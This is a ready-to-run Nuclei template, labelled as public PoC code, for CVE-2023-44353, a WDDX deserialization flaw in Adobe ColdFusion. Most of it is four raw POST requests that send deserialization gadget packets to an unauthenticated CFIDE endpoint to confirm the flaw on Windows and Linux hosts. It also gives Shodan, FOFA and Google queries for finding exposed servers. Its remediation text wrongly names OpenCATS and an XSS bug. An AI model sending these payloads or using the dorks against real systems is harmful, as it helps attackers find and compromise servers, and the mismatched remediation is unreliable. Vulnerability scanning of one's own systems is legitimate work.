Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.
PoC代码[已公开]
id: CVE-2023-44353
info:
name: Adobe ColdFusion WDDX Deserialization Gadgets
author: salts
severity: critical
description: |
Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.
remediation: |
To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-44353
- https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html
- https://research.nccgroup.com/2023/11/21/technical-advisory-adobe-coldfusion-wddx-deserialization-gadgets/#coldfusion-wddx.py
- https://github.com/JC175/CVE-2023-44353-Nuclei-Template
- https://github.com/nomi-sec/PoC-in-GitHub
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-44353
cwe-id: CWE-502
epss-score: 0.91469
epss-percentile: 0.99655
cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
vendor: adobe
product: coldfusion
shodan-query:
- http.component:"Adobe ColdFusion"
- http.component:"adobe coldfusion"
- http.title:"coldfusion administrator login"
- cpe:"cpe:2.3:a:adobe:coldfusion"
fofa-query:
- title="coldfusion administrator login"
- app="adobe-coldfusion"
google-query: intitle:"coldfusion administrator login"
tags: cve2023,cve,adobe,coldfusion,deserialization,xss
variables:
windows_known_path: "C:\\Windows\\"
windows_bad_path: "C:\\Thisdefinitelydoesnotexist\\"
linux_known_path: "/etc/"
linux_bad_path: "/thesecretcowlevelisreal/"
http:
- raw:
- |
POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_known_path}}</string></var></struct></data></wddxPacket>
- |
POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_bad_path}}</string></var></struct></data></wddxPacket>
- |
POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_known_path}}</string></var></struct></data></wddxPacket>
- |
POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_bad_path}}</string></var></struct></data></wddxPacket>
matchers-condition: or
matchers:
- type: dsl
name: windows
dsl:
- "status_code_1 == 500 && status_code_2 == 404"
- contains(body_1, "coldfusion.runtime")
condition: and
- type: dsl
name: linux
dsl:
- "status_code_3 == 500 && status_code_4 == 404"
- contains(body_3, "coldfusion.runtime")
condition: and
# digest: 4a0a0047304502207621982c6107665f6df5968c05a1a97214d887b5ac3157a39aad549a0ac16d33022100d9e7369460dbca0bb4ba7cd04c239f327b9542658876e71eb8bf84c2e6c0c470:922c64590222798bb761d5b6d8e72950